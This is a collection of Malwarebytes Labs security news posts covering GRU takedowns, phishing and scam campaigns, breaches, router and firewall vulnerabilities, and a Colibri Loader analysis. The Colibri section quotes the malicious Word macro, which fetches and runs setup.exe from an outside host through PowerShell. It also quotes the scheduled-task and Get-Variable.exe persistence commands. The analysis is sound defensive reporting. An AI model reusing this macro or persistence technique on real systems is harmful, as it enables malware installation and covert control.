IT NEWS

The US Department of Justice (DoJ) and Microsoft have taken the sting out of two operations believed to be controlled by the Russian Federation’s Main Intelligence Directorate (GRU).

On Wednesday, the DOJ announced that it had disrupted GRU’s control over thousands of internet-connected firewall devices compromised by the Russian Sandworm group.

One day later, Microsoft disclosed information about the steps it took to disrupt cyberattacks it had seen targeting Ukraine. These attacks came from Strontium, another GRU-connected threat actor.

In light of world news, it’s important to note that the Sandworm group has always been known to target Ukrainian companies and government agencies. It has been held responsible for destroying entire Ukrainian networks, triggering blackouts by targeting electrical utilities, and releasing the NotPetya malware.

Shutdown operation

Although the DOJ announcement came just two days ago, the takedown operation actually occured a little earlier, in March 2022. And the story starts before that, with a joint advisory released on 23 February by law enforcement agenices in the UK and the USA, about Cyclops Blink malware targeting network devices manufactured by WatchGuard and ASUS.

Cyclops Blink surfaced as a replacement for VPNFilter malware, which the DOJ disrupted with an operation in 2018. Both Cyclops Blink and VPNFilter are generally attributed to the Sandworm group, which has always been seen as a Russian state-sponsored actor.

On the same day the advisory was released, WatchGuard published a diagnosis and remediation plan, and ASUS released its own guidance. However, despite their advice, a botnet of “thousands of infected network hardware devices” running Cyclops Blink remained.

In March the DOJ set out to fix that by targeting the Command and Control (C2) servers that orchestrated the botnet. The department says it did this by copying and removing Cyclops Blink malware from the C2 devices, and closing the external management ports that the Sandworm group used to access them.

WatchGuard users that need the external management ports can reverse the closure through a device restart, but they are advised to follow this knowledge base article about remote management.

Although this stopped Sandworm from controlling the thousands of compromised WatchGuard and ASUS devices, it did not remove the malware from them.

According to Assistant Attorney General Matthew G. Olsen of the Justice Department’s National Security Division:

This court-authorized removal of malware deployed by the Russian GRU demonstrates the department’s commitment to disrupt nation-state hacking using all of the legal tools at our disposal. By working closely with WatchGuard and other government agencies in this country and the United Kingdom to analyze the malware and to develop detection and remediation tools, we are together showing the strength that public-private partnership brings to our country’s cybersecurity.

Sinkhole

On the same day that the DOJ announced its Cyclops Blink takedown, Microsoft obtained a court order authorizing it to take control of seven internet domains being used by the Strontium group.

The Strontium group, often referred to as Fancy Bear or APT28, is another GRU-connected threat actor known to target Ukrainian institutions, as well as government institutions and think-tanks in the United States and the European Union involved in foreign policy.

After taking control of the domains, Microsoft re-directed them to a sinkhole under its control. A sinkhole is a way of redirecting malicious internet traffic so that it can be captured and analyzed by security professionals. Sinkholes are most often used to seize control of botnets.

Microsoft describes this disruption as part of an ongoing long-term campaign, started in 2016, to take legal and technical action to seize infrastructure used by Strontium. The company has established a legal process that enables it to obtain rapid court decisions for this work. Prior to this week, it says it had taken action through this process 15 times to seize control of more than 100 Strontium controlled domains.

Good riddance

While these attacks are just a small part of the cyber-activity we are seeing in Ukraine, it does help to take out a few of these active major threats.

The FBI is urging people to contact their local field office if they believe they have a compromised device. The agency says it “ontinues to conduct a thorough and methodical investigation into this cyber incident.”

The post Successful operations against Russian Sandworm and Strontium groups targeting Ukraine revealed appeared first on Malwarebytes Labs.

Some of the biggest stars around have seen content placed on their YouTube accounts without permission over the last couple of days. Taylor Swift has around 40 million subscribers. Justin Bieber? 68 million. Harry Styles, a respectable 12 million. You can even add Eminem and Michael Jackson to the list of those taken over.

Big names, and even bigger numbers.

The last time I can remember an all-out targeted attack on social media musicians was way back in 2007 during Ye Olde Myspace days. While the threat for mischief there was big, this new attack far surpassed it in terms of people seeing dubious content.

Using Vevo as a stepping-stone to musician channels

According to The Record, the attack specifically targeted accounts using Vevo. The people behind it didn’t promote malware links, or spam, or phishing. Instead, they opted to post about a bizarre scam involving a security guard.

The scam involved a man claiming to have “2,000 tumours”, sentenced to 2 years in jail for grabbing around $319,000 in donations for his non-existent terminal illness. The group claiming to be behind the compromise demanded he be set free via their Twitter account.

If you’ve ever watched a music video from a major artist, there’s a good chance you’ll have seen the Vevo logo in the bottom right hand corner. This is the Vevo channel, where content is uploaded. As Gizmodo notes, videos are merged with the musician’s separate YouTube channel. Existing YouTube accounts can also be merged to create Official Artist Channels.

Speaking to The Verge, Vevo said “Some videos were directly uploaded to a small number of Vevo artist channels earlier today by an unauthorized source.”

This is what Vevo’s FAQ page has to say on the subject of how uploads work:

Vevo does not provide access directly to artists. If your music videos have been delivered to Vevo, you must work with your existing Content Provider/Label who will have access to perform these updates.

What about your YouTube security?

You may not be a multi-million album seller signed up to Vevo on YouTube, but you still need to lock down your YouTube account. Any compromise can lead to masses of spam or videos leading users off-site to phishing or malware.

Signing into YouTube requires a Google account. As such, good Google security hygiene means good YouTube security hygiene too. We’ve covered many Google-centric security concerns previously, but here’s some things you can do now to lock down your account:

• Create a strong password, and enable two-factor authentication (2FA). Use the Google Auth app for 2FA rather than SMS codes, this will help you avoid the threat of SIM-swap attacks.
• Don’t share sign-in information with others. If someone contacts you promising riches beyond your wildest dreams, they may ask for your login details to set up some sort of “affiliate” or partnership status. This is a bad idea, and you shouldn’t do it.
• Use Google’s security checkup. This informs you at a glance about recent login activity, device sign-ins, Gmail settings, and more. It’s a handy, focused way to make sense of the sometimes overwhelming range of options available.
• Remove sites and apps you don’t need or recognise. As with many social accounts, you’re able to connect to a variety of services. View connected apps here.
• Keep an eye on the comments posted to your videos. There’s a lot of spam out there and it may sully your reputation if followers end up in bad places via your content.

This should be enough to get your account moving to a place where it’s a lot more secure than before. While the chance of you being hit by an attack like the one above targeting very well known accounts is low, people regularly look to hijack regular YouTube accounts. Let’s not make it easy for them!

The post YouTube channels of Taylor Swift, Justin Bieber, Harry Styles, and other musicians compromised appeared first on Malwarebytes Labs.

Ledger is one of the biggest hardware cryptocurrency wallets around and scammers have noticed. Phishing mails are in circulation, hoping to snag Ledger users with a sneaky request for passphrases.

What is a Ledger recovery phrase?

A recovery phrase is an incredibly important combination of words that act as the literal keys to your digital crypto kingdom. The phrase is a human-readable version of a private key—a unique secret that must keep private, because it’s the cornerstone of the cryptography that says you own a crypto-someting rather than somebody else.

The Ledger recovery phrase also acts as a backup for everything in your hardware wallet, to the extent that if Ledger ceased operations, you’d still be able to access your crypto-assets via a compatible wallet service. As it put its:

When starting to use your Ledger hardware wallet, you will receive a random set of 24 words. This is also known as your Recovery Phrase. It’s a key element in using a hardware wallet and it must be kept secure and offline at all times.

As we can see, it’s critical to the wellbeing of your digital cash.

What’s the scam?

Phising emails are being sent that refer to a non-existent breach. The “solution” to this breach is to update the 24 word phrase as soon as possible and set up a new wallet PIN.

The mail reads:

If you’re receiving this e-mail, it’s because you’ve been affected by the breach. To protect your assets, please update your 24-Word Phrase and follow the instructions to set up a new PIN for your wallet.

Sincerely, Support Team

The mail also provides a link to a website called “Ledgerphrase(dot)com”.

Should you visit the website without the userID included in the email, the page won’t resolve. If you follow any of the links directly from the email, you’ll be greeted with a passphrase update page that asks users to enter their 24-word passphrase:

Anyone progressing past this point is playing with fire and likely to lose all of their crypto-assets.

How to foil the phishers

Ledger has confirmed this is a phishing attempt:

It also provides a list of security measures to ward off further attempts.

The most important thing to never, ever give anybody your 24 word passphrase. Only ever enter it on your device, and never hand it over to anyone claiming to need it or to websites requesting you enter it. Whether code converter websites, or apps, YouTube livestream giveaways, or even browser extensions claiming to be official products, the advice is still the same.

No matter which form of digital wallet you use, your recovery phrase is your last line of defence to keep bad people away from your funds.

The post Don’t enter your recovery phrase! Phishers target Ledger crypto-wallet users appeared first on Malwarebytes Labs.

Thanks to the Threat Intelligence team for their help with this article.

Security researchers from Armorblox, a cybersecurity company specializing in email-based threats, have encountered a fake WhatsApp email with the subject “New Incoming Voicemessage.”

The sender is “Whatsapp Notifier,” a spoofed name, and an email address using a legitimate domain belonging to a Russian road safety organization, to sneak through mail filters.

Recipients are encouraged to click a “Play” button and listen to their voicemail. That doesn’t happen, though—clicking “Play” directs recipients to a page where Aromorblox found an obfuscated, malicious JavaScript that redirected users to another page. The second page included an exploit, triggered when users responded to an Allow/Block prompt.

Prompts like this are also used by malvertisers when they want to push ads in front of users.

Ads can include (but are not limited to) scam sites, portals for unwanted browser extensions (PUPs), and even malware. The ads vary depending on a user’s device and location.

When we clicked the “Allow” button during our own testing, we were signed up to receive notifications from bingocaptchapoint.top.

The domain we had agreed to receive notifications from then used its priveleged position to redirect us to a page with a bogus offer.

Ten seconds after subscribing we hit our first ad: A Google Chrome “search contest”. And will you look at that?—we won!

This is one of many WhatsApp voicemail message scams. Another variant, detailed by Scam Detector, tricks Android users into downloading a payload called “Browser 6.5” which signs them up to receive text messages from premium rate phone numbers, for example.

What to do?

If you’re a WhatsApp user, remain vigilant and stay up to date with changes to WhatsApp’s services, so you know how they work. (For example, WhatsApp recently announced six changes to its voice message service.)

Check what you are approving before clicking “Allow” on browser prompts, and use a security tool that can block malicious sites and scripts.

and if you sign up for notifications from a site by accident you can remove it in Google Chrome by following these steps: Open Settings, click Privacy and Security, click Site Settings, click Notifications, scroll to Allowed to send notifications. Click the “three dots” icon next to the site you want to remove and click Remove.

If you believe you have fallen victim to this scam—or any other—at work, report the incident to your IT or security team.

Stay safe!

The post Watch out for fake WhatsApp “New Incoming Voicemessage” emails appeared first on Malwarebytes Labs.

In December last year, the customer information of Cash App users was accessed by a former employee of Block, the company behind the popular mobile payment service app. This was revealed in a very recent filing to the Securities and Exchange Commission (SEC), which shows that the former employee accessed and downloaded “certain reports” containing US customer information.

The filing reads:

“While this employee had regular access to these reports as part of their past job responsibilities, in this instance these reports were accessed without permission after their employment ended.”

Cash App is currently in the process of reaching out to its 8.2 million US users about the breach. That includes current and former Cash App users.

The compromised data contains full names and brokerage portfolio values. The filling explains the latter as “the unique identification number associated with customer’s stock activity on Cash App Investing”.

The document also clarified that compromised data “did not include usernames or passwords, Social Security numbers, date of birth, payment card information, addresses, bank account information, or any other personally identifiable information.” Security code, access code, or Cash App account passwords were also not part of the breached data.

According to an email interview with Vice, a Cash App spokesperson said they have already taken remediating steps, and launched an investigation “with the help of a leading forensics firm”.

We have yet to find out exactly how this former employee could still reach assets they should no longer be able to access after separating from their employer. Sadly, incidents like this happen all the time. Multiple studies have shown that many organizations’ former employees, regardless of the nature of their termination, can still access not just corporate data but also platforms used by their former employers. Such incidents are not only classified as insider threat incidents, but they are also good examples of many companies having improper offboarding practices.

Cash App can only be used in the US and UK. No UK customers were affected by this breach.

The post Cash App breached by a former employee could affect millions appeared first on Malwarebytes Labs.

Unfortunately scammers continue to focus on the invasion of Ukraine to make money. A flurry of bogus domains and scam techniques are spreading their wings. They appear to focus on donation fakeouts but there’s a few other nasty surprises lying in wait too.

The lowest of the low

There are few lower tactics than fake fundraising during times of crisis. It was rife during the earthquake and tsunami of 2011, with bogus Red Cross websites and email addresses set up to part people from their money. Money that could have been life-saving was diverted into the pockets of thieves. So too does history repeat itself during the invasion.

Reports indicate a big run on phishing and scams. According to email security firm Tessian, registrations of domains containing “Ukraine” have increased by 210% compared to last year. Perhaps that’s to be expected—the question is how many are genuine and how many are potential rip-off efforts. Tessian’s stats suggest that three quarters are suspicious:

An average of 315 new Ukraine themed domains have been observed per day since the 24th February. 77% of these domains appear to be suspicious based on early indicators. 

Fake it to make it

The tactics used match those deployed in 2011, and pretty much every other major catastrophe. Liberal use of official organisation logos and design which matches the real deal are all common. Where scams sometimes diverge from real fundraising sites is in requesting payment via cryptocurrency. There’s even some QR codes thrown into the mix.

One example given leans into the pressure angle, providing supposed commentary from a 16 year old. Given the horrendous scenes of devastation, this is bound to spur some folks into donating. Unfortunately it’ll only be lining the pockets of scammers.

There’s also word of sites selling Ukraine-themed products, such as t-shirts and other items. While those items aren’t likely to turn up, this is (potentially) less devastating than the donation sites given how much more people may be willing to send to charities.

This is, of course, all very bad. There are things you can do to lessen the risk from awful scams such as the above.

Tips to avoid donating to scammers

• If you receive a fundraising email out of the blue, don’t respond. Consider that reputable charity organisations won’t fire missives at you unless you’ve agreed to receive them. Instead, check with the organisation’s website directly—without using any links in the email.
• While cryptocurrency is being used for some forms of genuine donation, it’s a bear-pit out there, and this should be a red flag. Cryptocurrency scamming is rampant. As above, make your way to the official site of your chosen service and see what they’re doing in terms of donating.
• A sneaky trick donation scammers use is to ask you to reply to [insert scammer’s address], but also CC the mail of the target charity. This is to make it all look very genuine. They may claim the real address is overwhelmed, so you need to use the backup instead. It’s not a problem for the scammer to include a genuine mail as a CC, because they’re banking on the charity being so overwhelmed they won’t see it anyway. By the time somebody notices, you may have already replied to the faker and sent some money.

These tips should help you steer clear of the worst kind of scammers. Please do everything you can to ensure your donations reach those who need it the most, and leave the phishers with what they deserve: a big stack of nothing.

The post Beware Ukraine-themed fundraising scams appeared first on Malwarebytes Labs.

On April 4 2022, the Cybersecurity & Infrastructure Security Agency (CISA) added CVE-2021-45382 to its known exploited vulnerabilities catalog. But since the affected products have reached end of life (EOL), the advice is to disconnect them, if still in use.

CISA catalog

The CISA catalog of known exploited vulnerabilities was set up to list the most important vulnerabilities that have proven to pose the biggest risks. The catalog is an integral part of binding operational directive (BOD) 22-01 titled Reducing the Significant Risk of Known Exploited Vulnerabilities.

This directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third-parties on an agency’s behalf. One of the most welcomed required actions set forth in the directive is that CISA will keep a catalog of vulnerabilities alongside timeframes in which they must be remediated.

EOL

End-of-life (EOL) is an expression commonly used by software vendors to indicate that a product or version of a product has reached the end of usefulness in the eyes of the vendor. When products reach End of Support (EOS) or EOL it is usually announced far in advance.

As a general policy, when products reach EOS/EOL, they can no longer be supported, and all firmware development for these products cease. Unfortunately this often means that the security of these products quickly decreases. Found vulnerabilities only get patched in very rare cases.

The vulnerability

CVE-2021-45382 is a Remote Code Execution (RCE) vulnerability that exists in all series H/W revisions D-Link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file.

DDNS (Dynamic Domain Name System) is a function that allows systems to overcome the issues related to Dynamic IP Addresses, in attempting to connect to a resource somewhere on the Internet whose IP address may change at any time.

The ncc2 service on the affected devices allows for basic firmware and language file upgrades via the web interface. The ncc2 service on the affected devices appears to have been shipped with a number of diagnostic hooks available. Unfortunately, these hooks are able to be called without authentication. The necessary resources do not exist on the filesystem of the device, nor do they appear to be static. Instead, these files appear to be rendered when queried and can be used to both interrogate the given device for information, as well as enable diagnostic services on demand.

A Proof of Concept (PoC) is publicly available on GitHub, which makes it trivial for anyone with malicious intentions to take control of the vulnerable routers.

Affected devices

D-Link lists the affected models that have reached EOL as DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L all series and all hardware revisions. All of these models were offered a last update on 19 December 2021.

D-Link’s advice for these models is for them to be retired and replaced. For organizations to be in compliance with the binding operational directive 22-01 this will need to be done before 25 April 2022.

Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice.

Mitigation

In these cases, and under the given circumstances, it seems indeed best to replace the affected models with a more secure device. Recently CISA gave a similar advice for the D-Link DIR-610 and DIR-645, as well as for the Netgear DGN2200.

Stay safe, everyone!

The post CISA advises D-Link users to take vulnerable routers offline appeared first on Malwarebytes Labs.

This blog post was authored by Ankur Saini, with contributions from Hossein Jazi and Jérôme Segura

Colibri Loader is a relatively new piece of malware that first appeared on underground forums in August 2021 and was advertised to “people who have large volumes of traffic and lack of time to work out the material“. As it names suggests, it is meant to deliver and manage payloads onto infected computers.

Our Threat Intelligence Team recently uncovered a new Colibri Loader campaign delivering the Vidar Stealer as final payload. There is already published material about Colibri by CloudSek and independent researchers. Since most of the details about the bot have been covered, we decided to highlight a persistence technique we haven’t seen before.

Campaign attack chain

The attack starts with a malicious Word document deploying Colibri bot that then delivers the Vidar Stealer. The document contacts a remote server at (securetunnel[.]co) to load a remote template named trkal0.dot that contacts a malicious macro. This attack is known as remote template injection.

The macro enables PowerShell to download the final payload (Colibri Loader) as setup.exe:

Private Sub Document_Open()
zgotwed = "C:UsersPublicsetup.ex`e"
n87lcy4 = Replace("new:72Cs19e4ts4D", "s19e4ts", "2")
Set hu9v0dd = GetObject(n87lcy4 & "D5-D70A-438B-8A42-984" & CLng("1.8") & "4B88AFB" & CInt("8.1"))
hu9v0dd.exec "cm" & "d /c powers^hell -w hi Start-BitsTransfer -Sou htt`ps://securetunnel .co/connection/setup.e`xe -Dest " & zgotwed & ";" & zgotwed
End Sub

Abusing PowerShell for Persistence

Colibri leverages PowerShell in a unique way to maintain persistence after a reboot. Depending on the Windows version, Colibri drops its copy in %APPDATA%LocalMicrosoftWindowsApps and names it Get-Variable.exe for Windows 10 and above, while for lower versions it drops it in %DOCUMENTS%/WindowsPowerShell named as dllhost.exe

On Windows 7, it creates a scheduled task using the following command:

• schtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr “C:UsersadminDocumentsWindowsPowerShelldllhost.exe“

On Windows 10 and above, it creates a scheduled task using the following command:

• schtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr “powershell.exe -windowstyle hidden“

In the first scenario (Win7), we see a task pointing to the path of Colibri Loader. However, in the second we see an odd task to execute PowerShell with a hidden window. This is what we believe is a new persistence technique employed by the malware author.

As mentioned earlier, it drops the file with the name Get-Variable.exe in the WindowsApps directory. It so happens that Get-Variable is a valid PowerShell cmdlet (a cmdlet is a lightweight command used in the Windows PowerShell environment) which is used to retrieve the value of a variable in the current console.

Additionally, WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.

We reproduced this technique using the calculator to show how an adversary can easily achieve persistence combining a scheduled task and any payload (as long as it is called Get-Variable.exe and placed in the proper location):

A search on VirusTotal for the file name Get-Variable.exe indicates that the first malicious file uploaded to the platform happened last August, which matches with the time that Colibri appeared on XSS underground forums. That sample has the same networking features as Colibri which helps us ascertain with more confidence that the technique was debuted by Colibri.

Conclusion

Colibri is still in its infancy but it already offers many features for attackers and slowly seems to be gaining popularity. The persistence technique we outlined in this blog is simple but efficient and does not appear to be known.

Malwarebytes users are protected against this attack thanks to our Anti-Exploit layer:

IOCs

Word Document

666268641a7db3b600a143fff00a063e77066ad72ac659ebc77bb5d1acd5633d

setup.exe (Colibri)

54a790354dbe3ab90f7d8570d6fc7eb80c024af69d1db6d0f825c094293c5d77

install.exe (Vidar)

b92f4b4684951ff2e5abdb1280e6bff80a14b83f25e4f3de39985f188d0f3aad

The post Colibri Loader combines Task Scheduler and PowerShell in clever persistence technique appeared first on Malwarebytes Labs.

In a security advisory Zyxel has urged customers to update because a security flaw can lead to the circumvention of firewall protection in several Zyxel products.

Zyxel is a Taiwanese producer of modems and other networking equipment and its products are sold in over 150 countries.

The vulnerability

Zyxel says the vulnerability, listed as CVE-2022-0342, is an authentication bypass vulnerability caused by the lack of a proper access control mechanism, which has been found in the CGI program of some firewall versions. The flaw could allow an attacker to bypass the authentication and obtain administrative access of the device.

The Common Gateway Interface (CGI) is an interface specification that enables web servers to execute an external program, typically to process user requests.

Affected series

Zyxel has published a list of vulnerable products that are within their warranty and support period, and has released updates to address the issue.

From the security advisory it is unclear whether there are vulnerable products that are outside of the support period.

How to fix the Zyxel vulnerability

Administrators of the NSG V1.20 through V1.33 Patch 4 need to reach out to their local Zyxel support team for the file, or wait until May when standard patch V1.33 Patch 5 is scheduled to be released.

Owners of the other affected products can search for their updated firmware by model number on the Zyxel support download page. Please note that the patches should have a release date of 03/29/2022 or later.

For firewalls it is always a good idea to restrict the IP addresses that are permitted to access the management interface.

Stay safe, everyone!

The post Update now! Zyxel patches critical firewall bypass vulnerability appeared first on Malwarebytes Labs.

Holidays inspire fraudsters and scammers to create timely and effective ways to string people along and get them to give up either their money or their personal information. This is the case in this chocolate-themed scam.

Cadbury UK has issued a warning to its 315,000 followers on Twitter about a scam making the rounds on WhatsApp and other social media sites like Facebook.

Users of WhatsApp have reported receiving links to a web page where they can claim a “free Cadbury easter chocolate basket.”

When they open the link, users are presented with a short list of questions to answer—purportedly as part of an “Easter Egg Hunt”—before they are prompted to enter their personal details.

The Dorset Police Cyber Crime Unit posted an appeal about this scam to its Facebook page.

“DON’T CLICK THE LINK.” the post reads, the text bookended with the warning sign emoji. “Our Cyber Protect Officer has done it for you.”

The post continues with how the scam works:

“The site looks fairly convincing, however the only buttons that actually work are the ones to answer the questions. The search icon and the three little lines do nothing at all.

Once you answer those question [sic], you’re taken to a little game where you have to ‘find your prize’. Conveniently, your first and second tries won’t be successful, but you’ll ‘win’ on your third go! At that point, to claim your “prize”, you’ll be asked to hand over all sorts of personal information. That’s where the scam comes in!”

Looking at the shortened URL link (“tinyurl2.ru“) used in this campaign and how this scam campaign itself was formatted, it resembles the Amazon International Women’s Day 2022 Giveaway scam that is said to have gone viral in February.

It’s highly likely that scam links similar to these two can only be accessed via mobile devices.

This isn’t the first time Cadbury’s name has been dragged into a scam campaign. On December 2021, a Facebook scam about Cadbury reportedly giving away hampers of chocolate for Christmas did the rounds.

How to avoid falling for a scam like this

Warn your less security-savvy friends and family: When it comes to giveaways, think twice before clicking or sharing with friends, family, and social contacts. Scammers have always been on the prowl and do not rest until they get what they want. They are patient and have only got better at attempting to social engineer anyone who has a soft spot for anything—dogs, cats, commemorations, pizza, and, as we’ve just seen, chocolates.

Err on the side of caution. If you see a giveaway post in your feed, visit the official website of this brand to see if it’s genuine. Or, if they have a social media presence, which they usually do, ask on Twitter or Facebook. Send screenshots if you can.

It’s always a good idea to verify. But it’s not a good idea to click links thoughtlessly, and give your details away for delicious, delicious chocolate you can just buy from the shops.

Stay safe!

The post “Free easter chocolate basket” is a social media scam after your personal details appeared first on Malwarebytes Labs.